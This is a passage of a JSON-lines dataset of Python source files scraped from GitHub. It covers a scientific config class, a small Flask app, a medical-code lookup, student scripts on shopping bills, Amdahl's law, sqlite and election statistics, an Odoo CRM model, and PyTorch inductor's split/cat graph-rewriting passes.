isinstance(self.rmax, scalars):\n # for clean YAML conversion\n object.__setattr__(self, \"rmin\", float(self.rmin))\n object.__setattr__(self, \"rmax\", float(self.rmax))\n if self.rmin >= self.rmax:\n raise ConfigError(msg_scale_error)\n else:\n raise ConfigError(\"'rmin' and 'rmax' must be both sequences or float\")\n\n def __eq__(self, other: object) -> bool:\n if isinstance(other, self.__class__):\n return (\n array_equal(self.as_array(), other.as_array())\n and self.rweight == other.rweight\n and self.rbin_num == other.rbin_num\n )\n return NotImplemented\n\n def __getitem__(self, idx: int) -> Scale:\n scales = self.as_array()\n return Scale(rmin=scales[idx, 0], rmax=scales[idx, 1])\n\n def __iter__(self) -> Iterator[Scale]:\n for rmin, rmax in self.as_array():\n yield Scale(rmin=rmin, rmax=rmax)\n\n def modify(\n self,\n rmin: list[float] | float = DEFAULT.NotSet,\n rmax: list[float] | float = DEFAULT.NotSet,\n rweight: float | None = DEFAULT.NotSet,\n rbin_num: int = DEFAULT.NotSet,\n ) -> ScalesConfig:\n return super().modify(rmin=rmin, rmax=rmax, rweight=rweight, rbin_num=rbin_num)\n\n def as_array(self) -> NDArray[np.float_]:\n \"\"\"Obtain the scales cuts as array of shape (2, N)\"\"\"\n return np.atleast_2d(np.transpose([self.rmin, self.rmax]))\n\n @deprecated(\"use [str(scale) for scale in ScalesConfig] instead\", version=\"2.3.1\")\n def dict_keys(self) -> list[str]:\n \"\"\"Get the scale cuts formatted as a list of strings.\n\n Format is ``kpc[rmin]t[rmax]``, used as keys to pack outputs of\n correlation measurements in a dictionary when measuring with multiple\n scales cuts.\n\n .. deprecated:: 2.3.1\n Use instead\n\n >>> [str(scale) for scale in ScalesConfig]\n ...\n \"\"\"\n return [str(scale) for scale in self] # pragma: no cover\n","repo_name":"jlvdb/yet_another_wizz","sub_path":"src/yaw/config/scales.py","file_name":"scales.py","file_ext":"py","file_size_in_byte":6366,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"7893527061","text":"import json\nimport logging\n\nfrom flask import Flask\n\napp = Flask(__name__)\n\nnumber = 1234578\nnum = [x for x in str(number)]\nfirst_set = \"\".join(num[:3])\nrest_of_the_set = str(num[3:])\nfor i in rest_of_the_set % 3:\n print(int(first_set))\n print(rest_of_the_set)\n\n\n\n@app.route(\"/\")\ndef hello():\n app.logger.info('Metrics request successfull')\n return \"Hello World!\"\n\n\n@app.route(\"/status\")\ndef status_check():\n response = app.response_class(\n response=json.dumps({\"Result\": \"Ok - healthy\"}), status=200, mimetype='application/json'\n )\n app.logger.info(\"Success\")\n return response\n\n\n@app.route(\"/metrics\")\ndef metrics_check():\n metric_response = app.response_class(\n response=json.dumps({\"status\": \"Success\", \"code\": 0, \"data\": {\"UserCount\": 140, \"UserCountActive\":23}}),\n status=200,\n mimetype=\"application/json\"\n )\n app.logger.info(\"Thats how its done man\")\n return metric_response\n\n@app.route(\"/something\")\ndef funct():\n jsoresp = app.response_class(\n onet = json.dumps(\n\n )\n\n )\n\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(filename='app.log', level=logging.DEBUG)\n app.run(host='0.0.0.0')\n","repo_name":"Ken-muigai/nd001_go_docker_kubernetes","sub_path":"exercises/python-helloworld/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14642839368","text":"import hcuppy.utils as utils\n\nclass CCIEngine:\n\n def __init__(self):\n fn = \"data/cci_icd10cm_2019_1.csv\"\n self.dx2cci = utils.read_cci(fn)\n\n def get_cci(self, dx_lst):\n \"\"\"\n Returns CCI or a list of CCI for the given ICD code(s).\n Here, CCI stands for Chronic Condition Indicator..\n The original software can be found at \n https://www.hcup-us.ahrq.gov/toolssoftware/\n chronic_icd10/chronic_icd10.jsp\n\n Parameters\n __________\n icd_lst: list of str, or str\n A list of ICD10 diagnosis codes.\n The output is a list of corresponding CCIs.\n If this parameter is a scalar (not a list), then \n the output will be a scalar.\n \"\"\"\n\n\n output_type = \"list\"\n if not isinstance(dx_lst, list):\n output_type = \"value\"\n dx_lst = [dx_lst]\n \n dx_lst = [dx.strip().upper().replace(\".\",\"\") for dx in dx_lst]\n cci_lst = []\n out_default = {\"is_chronic\": False,\n \"body_system\": \"na\",\n \"body_system_desc\": \"na\"}\n for dx in dx_lst:\n if dx not in self.dx2cci:\n cci_lst.append(out_default)\n else:\n cci_lst.append(self.dx2cci[dx])\n\n out = cci_lst\n if output_type == \"value\":\n out = cci_lst[0]\n \n return out\n\n def has_chronic(self, dx_lst):\n cci_lst = [cci for cci in self.get_cci(dx_lst)]\n return any(cci[\"is_chronic\"] for cci in cci_lst)\n\n def is_chronic(self, dx):\n cci = self.get_cci(dx)\n return cci[\"is_chronic\"] \n\n\n","repo_name":"yubin-park/hcuppy","sub_path":"hcuppy/cci.py","file_name":"cci.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"72"} +{"seq_id":"26052695041","text":"d1={\"bread\":{\"prize\":70,\"quantity\":10},\n \"butter\":{\"prize\":100,\"quantity\":20},\n \"milk\":{\"prize\":110,\"quantity\":23},\n \"coffee\":{\"prize\":1000,\"quantity\":30}}\nl1=[]\nl2=[]\nl3=[]\nl4=[]\n\nprint(\"items we have \")\nfor i in d1.keys():\n l1.append(i)\nfor i in d1.values():\n l2.append(i)\nfor i in range(len(l1)):\n print(i+1,\")\",l1[i])\nfor i in l1:\n l3.append(d1[i][\"prize\"])\nl5=[]\ni1=int(input(\"enter how many items you wana buy \"))\ni=0\nwhile(i<=i1):\n # a=str(input(\"do you wana buy something \\n\"))\n # if a==\"yes\":\n a2=str(input(\"enter name of an item\"))\n a3=int(input(\"enter the no of \"))\n l4.append(a2)\n if a3==1:\n l5.append(d1[a2][\"prize\"])\n else:\n a=a3*d1[a2][\"prize\"]\n l5.append(a)\n a4=d1[a2][\"quantity\"]\n d1[a2][\"quantity\"]=a4-a3\n i=i+1\n\nprint(\"the items you bought is \\t\\t\\t prize\")\nfor i in range(len(l4)):\n print(i+1,l4[i],\"\\t\\t\\t\\t\\t\\t\\t\",l5[i])\nprint(\"your total bill is \",sum(l5))\nfor i in d1.keys():\n print(\"the items left\",i,d1[i][\"quantity\"])\n# in_put=str(input(\"enter the items you wana buy\"))\n","repo_name":"aun2810/first-repository","sub_path":"pytho.py","file_name":"pytho.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41979493616","text":"import numpy as np\nimport matplotlib.pyplot as pl \n\ndef sOfn(p,n):\n return 1/((1-p)+(p/n))\n \n \np = [0.5, 0.6, 0.7, 0.8, 0.9, 0.95]\nn = range(1,65536)\n\nfor i in p:\n pl.figure()\n iRange = [i]*len(n)\n a = map(sOfn,iRange,n)\n aMax = max(a)\n aMaxList = [aMax]*len(a)\n eps = 0.05*aMax\n difference = np.array(aMaxList) - np.array(a)\n procMinApprox = np.where(difference<=eps)[0][0]\n print ('Approximate number of processors required for 95% of maximum speed up ' + str(procMinApprox))\n\n pl.plot(n,a,label=('p = ' + str(i)))\n \n pl.legend(loc=4)\n pl.ylabel('run time speed up')\n pl.xlabel('log base 2 number of processors')\n pl.title('Run time speed up vs. # of processors for p =' + str(i))\n fig = pl.gcf()\n pl.xscale('log',basex=2)\n fig.set_size_inches(5,5) \n\npl.figure()\nfor i in p:\n iRange = [i]*len(n)\n a = map(sOfn,iRange,n)\n pl.plot(n,a,label=('p = ' + str(i)))\n\npl.legend(loc=4)\npl.ylabel('run time speedup')\npl.xlabel('log base 2 number of processors')\npl.title('Run time speed up vs. # of processors for various values of p')\nfig = pl.gcf()\npl.xscale('log',basex=2)\nfig.set_size_inches(10,10) \nplt.rcParams.update({'axes.titlesize': 'small'})\n\n","repo_name":"davidjuliancaldwell/ScientificSupercomputing","sub_path":"astro598scientific/davidcaldwell_hw7/amdahlsLaw.py","file_name":"amdahlsLaw.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29048459178","text":"# How many newsletter authors have associated Twitter accounts?\n# How many of those accounts mention Substack in bio?\n# %%\nimport glob\nimport json\nimport os\n\nfrom dotenv import load_dotenv\nimport twitter\nfrom tqdm import tqdm\n\nload_dotenv()\n# %%\nfiles = glob.glob(\"../data/*.json\")\n# %%\nnl = []\nfor i in files:\n with open(i, \"r\", encoding=\"utf-8\") as f:\n data = json.load(f)\n nl.extend(data)\n\n# %%\ntwitter_names = [i['twitter_screen_name'] for i in nl if 'twitter_screen_name' in i]\n\n# %%\nlen(set(twitter_names))\n# %%\nlen(twitter_names)/len(nl)\n\n# %%\napi = twitter.Api(consumer_key=os.environ[\"CONSUMER_KEY\"],\n consumer_secret=os.environ[\"CONSUMER_SECRET\"],\n access_token_key=os.environ[\"ACCESS_KEY\"],\n access_token_secret=os.environ[\"ACCESS_SECRET\"],\n sleep_on_rate_limit=True)\n# %%\nresults = []\nfor i in tqdm(twitter_names):\n try:\n desc = api.GetUser(screen_name=i).description\n substack = \"substack\" in desc.lower()\n result = {\"user\": i, \"description\": desc, \"mentions_substack\": substack}\n results.append(result)\n except twitter.TwitterError as e:\n print(e)\n pass\n# %%\nsum([i['mentions_substack'] for i in results])/len(nl)\n","repo_name":"NHagar/substack-collection","sub_path":"scripts/twitter_check.py","file_name":"twitter_check.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70040519593","text":"import sqlite3\nconn = sqlite3.connect('example.db')\n\ncursor = conn.cursor()\n\ncursor.execute(\"DROP TABLE IF EXISTS CONTACT\")\n\nsql = '''CREATE TABLE CONTACT(\n FIRST_NAME CHAR(20) NOT NULL,\n LAST_NAME CHAR(20),\n ID INT\n)'''\ncursor.execute(sql)\nprint(\"table created successfully.................\")\n\nconn.commit()\nconn.close()","repo_name":"arviinnd-5989/Sqlite3-tutorial","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16928639971","text":"\r\n#%%\r\n#%matplotlib inline\r\n# module importeren om request te doen\r\nimport urllib.request\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nimport numpy as np\r\nfrom scipy.stats import norm\r\nfrom scipy.stats.stats import pearsonr\r\n\r\nimport pandas as pd\r\nimport json\r\n\r\nplt.style.use('seaborn')\r\n\r\nMandaten = list()\r\nBlanco = list()\r\nkieskring = list()\r\nkieskring.append({\"gemeente\":\"dsfdfsd\", \"partij\":\"sdfdsfsf\"})\r\n\r\n\r\n\r\n# variabele om requested data in te plaatsen\r\nkieskringdata = urllib.request.urlopen(\r\n \"http://www.rocre.be/verkiezingen/json.php?fields=blanco_ongeldig,kieskring,lijst,zetels&duplicates=false\").read()\r\n\r\n# De data die we terugkeren gaan laden in JSON formaat\r\ndata = json.loads(kieskringdata)\r\n\r\n# Omdat de json data in een wrapper van results zit dit gaan vervangen zodat de code op volgende lijnen korter is.\r\ndata = data[\"results\"]\r\n\r\n\r\ndef search(gemeente, lijst):\r\n for d in kieskring:\r\n if(gemeente in d.values() and lijst in d.values()):\r\n return True\r\n else:\r\n found = False\r\n return found\r\n\r\n\r\nfor x in data:\r\n if(search(x[\"kieskring\"], x[\"lijst\"]) == False):\r\n thisdict = {\r\n \"gemeente\": x[\"kieskring\"],\r\n \"zetels\" : float(x[\"zetels\"]),\r\n \"lijst\" : x[\"lijst\"],\r\n \"blanco\" : float(x[\"blanco_ongeldig\"])\r\n }\r\n kieskring.append(thisdict)\r\n\r\nkieskring.pop(0)\r\n\r\ndataframe = pd.DataFrame(kieskring)\r\nprint(dataframe)\r\n#newlist = sorted(kieskring, key=lambda k: k['mandaten']) \r\n\r\n#print(len(newlist))\r\n\r\nfor p in kieskring:\r\n #if(float(p[\"mandaten\"]) < 49 or float(p[\"blanco\"]) < 2000):\r\n Mandaten.append(p[\"zetels\"])\r\n Blanco.append(p[\"blanco\"])\r\n\r\nprint(pearsonr(Mandaten, Blanco))\r\nprint(len(Mandaten))\r\nplt.scatter(Mandaten, Blanco)\r\n\r\nz = np.polyfit(Mandaten, Blanco, 1)\r\np = np.poly1d(z)\r\nplt.plot(Mandaten,p(Mandaten),\"r--\")\r\n\r\nplt.xlabel(\"Mandaten\")\r\nplt.ylabel(\"Blanco stemmen\")\r\n\r\n\r\nplt.show()\r\n\r\n#Er is geen verband \r\n\r\n","repo_name":"TijsDeBelie/BigDataVerkiezingen","sub_path":"BD_verkiezingen/Python scripts/stelling3-bis.py","file_name":"stelling3-bis.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"nl","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41500931855","text":"# -*- coding :utf-8 -*-\n\nfrom openerp import models,fields,api\n\nclass CRMLeadEpt(models.Model):\n _name=\"crm.lead.ept\"\n _description=\"CRM Lead\"\n\n partner_id=fields.Many2one(comodel_name=\"res.partner.ept\",string=\"Partner\")\n order_ids=fields.One2many(comodel_name=\"sale.order.ept\",inverse_name=\"crm_lead_id\",string=\"Order\",readonly=True)\n team_id = fields.Many2one(comodel_name=\"crm.team.ept\",string=\"CRM Team\")\n user_id=fields.Many2one(comodel_name=\"res.users\",string=\"Salesperson\",required=True)\n lead_line_ids=fields.One2many(comodel_name=\"crm.lead.line.ept\",inverse_name=\"lead_id\",string=\"CRM Lead Line\")\n state=fields.Selection([('New','New'),('Qualified','Qualified'),('Proposition','Proposition'),('Won','Won'),('Lost','Lost')],string=\"State\",help=\"State of the CRM Lead\",default=\"New\")\n won_date=fields.Date(string=\"Won Date\")\n lost_reason=fields.Char(string=\"Lost Reason\",help=\"Reason of the lost\")\n next_followup_date=fields.Date(string=\"Next Followup Date\")\n partner_name=fields.Char(string=\"Name\",help=\"Name of the partner\")\n partner_email=fields.Char(string=\"Email\",help=\"Email of the partner\")\n partner_country_id = fields.Many2one(comodel_name=\"res.country.ept\", string=\"Country\", help=\"Country of the customer\")\n partner_state_id = fields.Many2one(comodel_name=\"res.state.ept\", string=\"State\", help=\"State of the country\")\n partner_city_id = fields.Many2one(comodel_name=\"res.city.ept\", string=\"City\",help=\"City of the state\")\n partner_phone_no=fields.Char(string=\"Phone\",help=\"Phone number of the partner\")\n\n @api.model\n def change_qualified_state(self):\n \"\"\"\n :Functionality: To change state based on button click\n :return: -\n \"\"\"\n self.write({'state' : 'Qualified'})\n\n @api.multi\n def change_proposition_state(self):\n self.write({'state': 'Proposition'})\n\n @api.multi\n def change_won_state(self):\n self.write({'state': 'Won','won_date':fields.Date.today()})\n\n\n @api.multi\n def change_lost_state(self):\n self.write({'state': 'Lost'})\n\n @api.multi\n def generate_sales_quotation(self):\n \"\"\"\n functionality:generate sales quotation in crm lead using traditional and triplet\n :return: -\n \"\"\"\n if not self.partner_id:\n raise Warning(\"Customer cannot be selected, First you have create the customer.\")\n else:\n # Traditional way\n order_lines=[]\n for line in self.lead_line_ids:\n order_lines.append((0,0,{'product_id':line.product_id.id,\n 'name':line.name,'quantity':line.expected_sell_qty,'uom_id':line.uom_id.id,\n 'unit_price':line.product_id.sale_price}))\n\n tmp_order=self.env['sale.order.ept'].new({'partner_id':self.partner_id.id})\n tmp_order.onchange_partner_id()\n order=self.env['sale.order.ept'].create({\n 'partner_id':self.partner_id.id,\n 'partner_invoice_id':tmp_order.partner_invoice_id.id,\n 'partner_shipping_id':tmp_order.partner_shipping_id.id,\n 'crm_lead_id':self.id,\n 'order_line_ids':order_lines\n })\n\n # for line in self.lead_line_ids:\n # self.env['sale.order.line.ept'].create({'order_id':order.id,'product_id':line.product_id.id,\n # 'name':line.name,'quantity':line.expected_sell_qty,'uom_id':line.uom_id.id,\n # 'unit_price':line.product_id.sale_price})\n\n\n @api.multi\n def create_partner(self):\n if not self.partner_id:\n partner=self.env['res.partner.ept'].create({'name':self.partner_name,'email':self.partner_email,\n 'phone':self.partner_phone_no,'city_id':self.partner_city_id.id,\n 'country_id':self.partner_country_id.id,'state_id':self.partner_state_id.id})\n\n self.write({'partner_id': partner.id})\n else:\n raise Warning(\"Customer already selected\")\n\n\n\n\n\n\n\n\n","repo_name":"sejalk-emipro/odoo_exercise_02","sub_path":"sale_ept/models/crm_lead_ept.py","file_name":"crm_lead_ept.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14825829399","text":"import itertools\nimport logging\nimport operator\nfrom typing import Any, Callable, List, Optional, Sequence, Set, Tuple, Union\n\nfrom typing_extensions import TypeAlias\n\nimport torch\nfrom torch._dynamo.utils import counters\n\nfrom ..pattern_matcher import (\n Arg,\n CallFunction,\n CallFunctionVarArgs,\n CallMethodVarArgs,\n config_flag,\n FailedMatch,\n get_arg_value,\n Ignored,\n KeywordArg,\n ListOf,\n Match,\n MatchContext,\n MULTIPLE,\n PatternExpr,\n register_graph_pattern,\n RepeatedExpr,\n)\nfrom .pre_grad import (\n merge_getitem_cat_pass,\n merge_splits_pass,\n normalization_pass,\n split_cat_pass,\n unbind_stack_pass,\n)\n\nlog = logging.getLogger(__name__)\n\n_Arguments: TypeAlias = Tuple[torch.fx.node.Argument, ...]\n_TransformParam: TypeAlias = Tuple[\n Optional[_Arguments],\n Optional[_Arguments],\n Optional[_Arguments],\n Optional[_Arguments],\n]\n_Range: TypeAlias = Tuple[int, int]\n\n\ndef _get_split_args_default(split_node):\n input_kwarg = \"tensor\"\n split_size_kwarg = \"split_size_or_sections\"\n dim_kwarg = \"dim\"\n default_dim_value = 0\n if split_node.op == \"call_method\":\n split_size_kwarg = \"split_size\"\n return (\n get_arg_value(split_node, 0, input_kwarg),\n get_arg_value(split_node, 1, split_size_kwarg),\n get_arg_value(split_node, 2, dim_kwarg) or default_dim_value,\n )\n\n\ndef normalize_split_base(\n match: Match,\n _get_split_args: Callable[\n [torch.fx.Node], Tuple[Optional[torch.fx.Node], Optional[Any], Optional[int]]\n ],\n):\n \"\"\"\n Normalize split with split_size into split_with_sizes, so that we only deal with one type of split in\n subsequent optimizations\n \"\"\"\n split_node = match.nodes[0]\n graph = match.graph\n split_input, split_size, split_dim = _get_split_args(split_node)\n if split_input is None or split_dim is None or split_size is None:\n log.info(\"couldn't find split args\")\n return\n if \"example_value\" not in split_node.meta:\n log.warning(\"example value absent for node: %s\", split_node)\n return\n assert isinstance(split_node.meta[\"example_value\"], (list, tuple))\n split_sections = [t.size()[split_dim] for t in split_node.meta[\"example_value\"]]\n\n if any(isinstance(section, torch.SymInt) for section in split_sections):\n # TODO dynamic_shapes with assume_static_by_default=False fails while AOT Autograd tracing.\n return\n if split_dim < 0: # Normalize split dim\n split_dim += split_input.meta[\"example_value\"].dim()\n with graph.inserting_after(split_node):\n new_split_node = graph.call_function(\n torch.split,\n args=(split_input, split_sections),\n kwargs={\"dim\": split_dim},\n )\n split_node.replace_all_uses_with(new_split_node)\n new_split_node.meta.update(split_node.meta)\n graph.erase_node(split_node)\n counters[\"inductor\"][\"split_cat_norm\"] += 1\n\n\n@register_graph_pattern(\n CallFunctionVarArgs(torch.split, users=MULTIPLE),\n pass_dict=normalization_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n CallMethodVarArgs(\"split\", users=MULTIPLE),\n pass_dict=normalization_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef normalize_split_default(match: Match, *args, **kwargs):\n return normalize_split_base(match, _get_split_args_default)\n\n\n@register_graph_pattern(\n CallFunctionVarArgs(torch.cat, users=MULTIPLE),\n pass_dict=normalization_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef normalize_cat_default(match: Match, *args, **kwargs):\n cat_node = match.nodes[0]\n graph = match.graph\n tensors = get_arg_value(cat_node, 0, \"tensors\")\n cat_dim = get_arg_value(cat_node, 1, \"dim\")\n if cat_dim is None:\n cat_axis = cat_node.kwargs.get(\"axis\")\n if cat_axis is not None:\n cat_dim = cat_axis\n else:\n cat_dim = 0\n if tensors is None or cat_dim is None:\n log.info(\"couldn't find cat args\")\n return\n assert isinstance(tensors, (list, tuple))\n for tensor in itertools.chain([cat_node], tensors):\n if \"example_value\" not in tensor.meta:\n log.warning(\"example value absent for node: %s\", tensor)\n return\n\n ndim = cat_node.meta[\"example_value\"].dim()\n\n def is_empty_tensor(x):\n # special case where torch.cat supports cat'ing with an empty tensor\n x_shape = x.meta[\"example_value\"].shape\n return len(x_shape) == 1 and x_shape[0] == 0\n\n assert all(\n ndim == x.meta[\"example_value\"].dim() or is_empty_tensor(x) for x in tensors\n )\n\n if cat_dim < 0: # Normalize cat dim\n cat_dim += ndim\n\n with graph.inserting_after(cat_node):\n new_cat_node = graph.call_function(\n torch.cat,\n args=(tensors,),\n kwargs={\"dim\": cat_dim},\n )\n cat_node.replace_all_uses_with(new_cat_node)\n new_cat_node.meta.update(cat_node.meta)\n graph.erase_node(cat_node)\n counters[\"inductor\"][\"split_cat_norm\"] += 1\n\n\n@register_graph_pattern(\n CallFunctionVarArgs(torch.stack, users=MULTIPLE),\n pass_dict=normalization_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef normalize_stack_default(match: Match, *args, **kwargs):\n node = match.nodes[0]\n graph = match.graph\n tensors = get_arg_value(node, 0, \"tensors\")\n dim = get_arg_value(node, 1, \"dim\") or 0\n if tensors is None or dim is None:\n log.info(\"couldn't find stack args\")\n return\n assert isinstance(tensors, (list, tuple))\n\n # A bug in pytorch, some nodes miss the example_value metadata\n for tensor in itertools.chain([node], tensors):\n if \"example_value\" not in tensor.meta:\n log.warning(\"example value absent for node: %s\", tensor)\n return\n\n ndim = node.meta[\"example_value\"].dim()\n if dim < 0: # Normalize dim\n dim += ndim\n\n with graph.inserting_after(node):\n new_node = graph.call_function(\n node.target,\n args=(tensors,),\n kwargs={\"dim\": dim},\n )\n node.replace_all_uses_with(new_node)\n new_node.meta.update(node.meta)\n graph.erase_node(node)\n counters[\"inductor\"][\"split_cat_norm\"] += 1\n\n\ndef find_next_users(split_node: torch.fx.Node) -> List[torch.fx.Node]:\n next_users = []\n for getitem_node in split_node.users.keys():\n for getitem_user in getitem_node.users.keys():\n if getitem_user not in next_users:\n next_users.append(getitem_user)\n return next_users\n\n\n@register_graph_pattern(\n CallMethodVarArgs(\"squeeze\", users=MULTIPLE),\n pass_dict=normalization_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef normalize_squeeze_default(match: Match, *args, **kwargs):\n squeeze_node = match.nodes[0]\n squeeze_input = get_arg_value(squeeze_node, 0)\n\n if \"dim\" in squeeze_node.kwargs:\n assert len(squeeze_node.args) == 1\n dim = squeeze_node.kwargs[\"dim\"]\n elif len(squeeze_node.args) == 1:\n # squeeze(Tensor)\n dim = None\n elif len(squeeze_node.args) == 2:\n # squeeze(Tensor self, int dim)\n # squeeze(Tensor self, int[] dim)\n dim = squeeze_node.args[1]\n else:\n # squeeze(Tensor self, int[] dim) (called with varargs)\n dim = squeeze_node.args[1:]\n\n if isinstance(dim, Sequence) and len(dim) == 1:\n dim = dim[0]\n\n with match.graph.inserting_after(squeeze_node):\n if dim is None:\n new_squeeze_node = match.graph.call_function(\n torch.squeeze, args=(squeeze_input,)\n )\n else:\n new_squeeze_node = match.graph.call_function(\n torch.squeeze, args=(squeeze_input, dim)\n )\n squeeze_node.replace_all_uses_with(new_squeeze_node)\n match.graph.erase_node(squeeze_node)\n\n\nclass TorchSplit(CallFunction):\n \"\"\"\n Matches a call to torch.split if it is in a normalized form. Ensures that all users of\n splits are unique getitems.\n \"\"\"\n\n def __init__(self, arg, sizes):\n # using KeywordArg(\"dim\") for `dim` checks they all match\n super().__init__(\n torch.split, arg, sizes, _users=MULTIPLE, dim=KeywordArg(\"dim\")\n )\n\n def _match(self, node: torch.fx.Node, ctx: MatchContext):\n m = super()._match(node, ctx)\n if not m:\n return m\n split_sections = node.args[1]\n if not isinstance(split_sections, (list, tuple)):\n return FailedMatch(\"split not normalized\")\n # check users are all unique getitems\n seen_idxs = set()\n for user in node.users:\n if not CallFunction(operator.getitem, Arg(), Arg()).match(user):\n # This should ideally never happen. Split user should always be a getitem\n return FailedMatch(f\"user of split not a getitem: {user}\")\n if not isinstance(user.args[1], int):\n return FailedMatch(\"only integer getitems are handled\")\n if user.args[1] in seen_idxs:\n return FailedMatch(f\"duplicate getitem {user.args[1]}\")\n if user.args[-1] < 0:\n # This shouldn't ideally happen as dynamo normalizes indexes to positive\n return FailedMatch(\"negative index\")\n seen_idxs.add(user.args[1])\n return m\n\n\n@register_graph_pattern(\n TorchSplit(\n CallFunction(\n operator.getitem,\n TorchSplit(\n KeywordArg(\"first_split_input\"),\n KeywordArg(\"first_split_sections\"),\n ),\n Ignored(),\n ),\n KeywordArg(\"next_split_sections\"),\n ),\n pass_dict=merge_splits_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef merge_splits(\n match: Match,\n first_split_input: torch.fx.Node,\n first_split_sections: List[int],\n next_split_sections: List[int],\n # Note: dim is implicitly passed by TorchSplit, as it internally uses a pattern with dim\n dim: int,\n):\n node = match.output_node()\n graph = match.graph\n first_split = node.args[0].args[0]\n next_split_index = node.args[0].args[1]\n\n new_split_sections = list(first_split_sections)\n new_split_sections[next_split_index : next_split_index + 1] = next_split_sections\n\n first_split_dim = first_split.kwargs[\"dim\"]\n\n to_remove = []\n\n with graph.inserting_before(first_split):\n # Add the new split node\n new_split = graph.call_function(\n torch.split,\n args=(first_split_input, new_split_sections),\n kwargs={\"dim\": first_split_dim},\n )\n first_split_num_to_user = {\n user.args[1]: user for user in first_split.users.keys()\n }\n\n new_split_num = 0\n for split_num in range(len(first_split_sections)):\n if split_num not in first_split_num_to_user:\n new_split_num += 1\n continue\n old_getitem = first_split_num_to_user[split_num]\n if split_num != next_split_index:\n old_getitem.update_arg(0, new_split)\n old_getitem.update_arg(1, new_split_num)\n new_split_num += 1\n else:\n next_split_num_to_user = {\n user.args[1]: user for user in node.users.keys()\n }\n for next_split_num in range(len(next_split_sections)):\n with graph.inserting_after(new_split):\n new_getitem = graph.call_function(\n operator.getitem, args=(new_split, new_split_num)\n )\n new_split_num += 1\n next_getitem = next_split_num_to_user[next_split_num]\n new_getitem.meta.update(next_getitem.meta)\n next_getitem.replace_all_uses_with(new_getitem)\n to_remove.append(next_getitem)\n to_remove.append(node)\n to_remove.append(old_getitem)\n\n to_remove.append(first_split)\n for node in to_remove:\n graph.erase_node(node)\n\n counters[\"inductor\"][\"consecutive_split_merged\"] += 1\n\n\nclass SplitCatSimplifier:\n \"\"\"\n Helper class to simplify split-cat pattern. In simple cases, both split and cat node can be removed in a \"split->cat\"\n pattern. However, there are various cases where they can't and we need to simplify split/ add transforms before cat.\n Some such cases are:\n 1. Final node has additional args (not coming from the initial split)\n 2. Shuffling of args between split/cat\n 3. Some final nodes are non-(cat/stack)\n 4. Split-dim != cat-dim (but equal split)\n\n Note that any combination of the above cases can happen.\n\n To deal with 1, 2, & 3 - we iterate over all users of split. And figure out common \"ranges\" that can be merged.\n Then, we simplify the split accordingly. In the best case, split can be entirely removed.\n\n To deal with 4, we add some transformations (unflatten + movedim) (See `get_transform_params`).\n\n Finally, depending on final node being cat or stack, unsqueeze/flatten needs to be added.\n\n \"\"\"\n\n def simplify(\n self,\n graph: torch.fx.Graph,\n split_node: torch.fx.Node,\n split_sections: List[int],\n ):\n # Find the next users (i.e. users after the getitem)\n next_users = find_next_users(split_node)\n # Gather inputs of the next users. When inputs come from `split_node`, they are instead represented by\n # a tuple indicating the split ranges. See `get_user_input_list` for more details\n user_inputs_list = self.get_user_input_list(split_node, next_users)\n # Simplify the split_sections based on user_inputs_list. In simpler cases, len(simplified_split_ranges) == 1 and\n # we can simply replace the split node. Otherwise, we simplify it.\n simplified_split_ranges = self.get_simplified_split_ranges(\n split_sections, next_users, user_inputs_list\n )\n if not simplified_split_ranges: # Simplification not possible\n return\n transform_params_list = self.get_transform_params(\n split_node, next_users, user_inputs_list\n )\n if not transform_params_list:\n return\n\n # Start actual replacement\n user_inputs_list_new = self.replace_split(\n graph, split_node, split_sections, user_inputs_list, simplified_split_ranges\n )\n self.replace_cat(\n graph, split_node, next_users, user_inputs_list_new, transform_params_list\n )\n self.erase_old_nodes(graph, split_node, next_users)\n\n def get_user_input_list(\n self, split_node: torch.fx.Node, next_users: List[torch.fx.Node]\n ) -> List[List[Union[torch.fx.Node, _Range]]]:\n \"\"\"\n Returns list of inputs to the following user nodes, in order. The outer list represents the user node. The inner\n list represents the inputs to that particular node. This list can either contain\n - a tuple representing the ranges of get_items that should go into the cat (closed interval)\n - torch.fx.Node representing \"other\" inputs (which are not coming from our split)\n \"\"\"\n user_inputs_list: List[List[Union[torch.fx.Node, _Range]]] = []\n for user in next_users:\n if user.target in {torch.cat, torch.stack}:\n user_inputs_list.append(self.get_merged_user_inputs(split_node, user))\n else:\n user_inputs_list.append(self.get_non_cat_node_input(split_node, user))\n return user_inputs_list\n\n def get_merged_user_inputs(\n self, split_node: torch.fx.Node, cat_node: torch.fx.Node\n ) -> List[Union[torch.fx.Node, _Range]]:\n user_inputs = get_arg_value(cat_node, 0, \"tensors\")\n simplified_user_inputs = []\n split_users = set(split_node.users.keys())\n for user_input in user_inputs:\n if user_input not in split_users:\n simplified_user_inputs.append(user_input)\n else:\n # Add which \"getitem\" cat 